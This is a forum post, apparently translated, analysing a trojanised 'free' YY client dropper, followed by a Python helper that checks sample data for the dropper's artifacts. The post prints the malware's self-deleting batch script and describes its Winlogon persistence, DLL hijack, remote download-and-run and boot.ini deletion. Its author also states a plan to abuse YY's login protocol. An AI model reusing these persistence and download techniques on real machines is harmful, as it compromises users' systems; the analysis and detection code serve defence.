[Original] The so-called YY "free edition"
Posted on: 2011-10-2 17:45
Honestly, here in **, the least trustworthy word of all is "free". I only wanted something I could use to analyze YY's login protocol, so I could write my own multi-instance client and go boost someone's channel.
The download is a RAR; unpack it.
Inside is an EXE. Dragging it into OD shows it is an NSIS installer, so drag it into Universal Extractor to unpack it.
That yields two EXEs: one with the same name, and another called kk1.exe. At that point my mood went dark…
Dragging kk1 into OD, it looks like a piece of hand-written assembly. As a matter of routine it drops UpdateUsp.dll, usp10.dll and SystemUpdate.exe, naturally into System32. By the way, I hit the wrong key while writing this tutorial, so I will have to reinstall the VM again in a moment. Sigh…
Then, while writing out SystemUpdate.exe, it decodes a wondrous string from the tail of kk1.exe:
OOOOOO20aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0p5J5x3K6c8Q4x3V1k6&6P5g2)9J5k6i4c8^5N6q4)9%4b7@1y4Q4x3@1q4Q4y4f1y4i4d9f1&6p5e0#2N6e0i4K6g2o6j5X3!0G2N6q4)9J5k6h3W2F1K9b7`.`.
CCCCCCdbcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5%4y4q4)9J5k6e0p5K6z5g2)9J5k6e0p5H3y4#2)9J5k6e0t1@1x3W2)9K6b7e0p5J5x3K6c8Q4x3V1k6Y4k6i4c8Q4x3X3g2S2M7%4l9`.
VVVVVVkk1
Then it opens an IE window to a whole batch of URLs.
Really nothing worth saying about those…
Now let's look at SystemUpdate.exe.
Under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon it writes: C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\Tasks\conime.exe
Next it copies itself to %windir%/tasks/conime.exe and runs that copy.
Then it creates a dll.bat with the following contents:
@echo off
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@del 3596799a1543bc9f.aqq
@del "C:\SystemUpdate.exe"
@del dll.bat
@exit
And then it really does exit. Of course, this part only runs when it finds it is not in C:\WINDOWS\Tasks.
Now for the flow when it is there:
It promptly reads the bytes appended to itself.
OOOOOO11bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0p5J5x3K6c8Q4x3V1k6&6P5g2)9J5k6i4c8^5N6q4)9%4b7@1y4Q4x3@1q4Q4y4f1y4i4d9f1&6p5e0#2N6e0i4K6g2o6j5X3!0G2N6q4)9J5k6h3W2F1K9g2)9J5y4X3&6T1M7%4m8Q4x3@1t1`. = UrlDownloadFileA 30bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0p5J5x3K6c8Q4x3V1k6&6P5g2)9J5k6i4c8^5N6q4)9J5k6q4)9J5y4X3N6@1i4K6y4n7b7#2)9K6b7g2)9#2b7#2N6u0e0V1c8a6g2#2y4Q4y4f1y4T1L8$3!0@1i4K6u0W2K9h3&6A6
Then it downloads each of the exes listed there in turn, and deletes boot.ini.
CCCCCC30dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5%4y4q4)9J5k6e0p5K6z5g2)9J5k6e0p5H3y4#2)9J5k6e0t1@1x3W2)9K6b7e0p5J5x3K6c8Q4x3V1k6Y4k6i4c8Q4x3X3g2S2M7%4l9`. VVVVVVkk1 is used like this:
bdfK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5%4y4q4)9J5k6e0p5K6z5g2)9J5k6e0p5H3y4#2)9J5k6e0t1@1x3W2)9K6b7e0p5J5x3K6c8Q4x3V1k6Y4k6i4c8Q4x3X3g2S2M7%4m8Q4x3@1k6E0j5h3y4Q4x3@1b7H3x3q4)9J5k6o6m8U0i4K6u0V1x3U0W2Q4x3X3b7^5j5g2)9J5k6o6q4U0i4K6u0V1j5$3g2Q4x3U0k6$3k6i4u0Q4x3@1c8C8K9K6q4Q4x3U0k6H3L8Y4g2E0i4K6y4p5x3U0V1`.
A string this plain needs no explanation, right?
After submitting it returns the five characters "addok"; if the final pnum is not 29, the reply is "updateok" instead.
Then it rests for a while and repeats the two steps above.
Next, UpdateUsp.dll. Honestly, I don't believe an exe of a few dozen KB can drop a dll of several hundred KB, and its original filename tells me that this is the genuine usp10.dll.
Then there is the dropped 6.5 KB usp10.dll (NewDownload.dll):
First it checks: has Miss 360 loaded me? If so, let's die together!
Then: has Explorer loaded me? If not, forget it. If so, create a thread.
The thread:
It uses the Application value under HKLM\Software\360Safe\menuext\LiveUpdate360 to locate SoftMgr.exe, but does not infect it.
Then it runs SystemUpdate.exe and 360's SoftMgr.exe.
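A defender-side triage helper for the artifacts this post describes (the extra entry appended to the Winlogon value, the undersized usp10.dll next to the renamed UpdateUsp.dll, and the copy in the Tasks directory), written as an added example rather than code from the post. It assumes the Winlogon value in question is Userinit, the default userinit.exe path, and a 100 KB size floor for the genuine usp10.dll; the directory listing and file sizes are constructed, so it runs offline against a live host's data only if you feed that in.

```python
"""Triage helpers for the persistence artifacts described in the post.
All inputs are constructed samples; nothing here reads a live registry
or filesystem, so the checks run on any platform."""
import ntpath

# Assumption: default install path of the genuine userinit.exe.
LEGIT_USERINIT = r"C:\WINDOWS\system32\userinit.exe"
# Assumption: the real usp10.dll is "several hundred KB"; the drop-in is 6.5 KB.
USP10_MIN_BYTES = 100 * 1024

# Winlogon value exactly as the post reports it (assumed to be Userinit).
SAMPLE_WINLOGON_VALUE = r"C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\Tasks\conime.exe"

# Constructed listing {path: size in bytes} mirroring the dropped files.
SAMPLE_LISTING = {
    r"C:\WINDOWS\system32\usp10.dll": 6656,        # the 6.5 KB NewDownload.dll
    r"C:\WINDOWS\system32\UpdateUsp.dll": 406528,  # renamed genuine DLL (size constructed)
    r"C:\WINDOWS\Tasks\conime.exe": 24576,         # dropper copy (size constructed)
    r"C:\WINDOWS\system32\userinit.exe": 26624,    # legitimate, must not be flagged
}


def suspicious_winlogon_entries(value):
    """Return every comma-separated entry that is not the genuine userinit.exe.
    Trailing commas yield empty entries, which are ignored; the comparison is
    case-insensitive because Windows paths are."""
    entries = [e.strip() for e in value.split(",")]
    return [e for e in entries if e and e.lower() != LEGIT_USERINIT.lower()]


def triage_listing(listing):
    """Scan {path: size} and return (path, reason) pairs for the three
    file artifacts the post describes."""
    findings = []
    for path, size in listing.items():
        name = ntpath.basename(path).lower()
        parent = ntpath.dirname(path).lower()
        if name == "usp10.dll" and size < USP10_MIN_BYTES:
            findings.append((path, "usp10.dll far smaller than the genuine DLL"))
        elif name == "updateusp.dll":
            findings.append((path, "renamed original usp10.dll left by the dropper"))
        elif name == "conime.exe" and parent.endswith("\\tasks"):
            findings.append((path, "dropper copy in the Tasks directory"))
    return findings


if __name__ == "__main__":
    print(suspicious_winlogon_entries(SAMPLE_WINLOGON_VALUE))
    for path, reason in triage_listing(SAMPLE_LISTING):
        print(path, "->", reason)
```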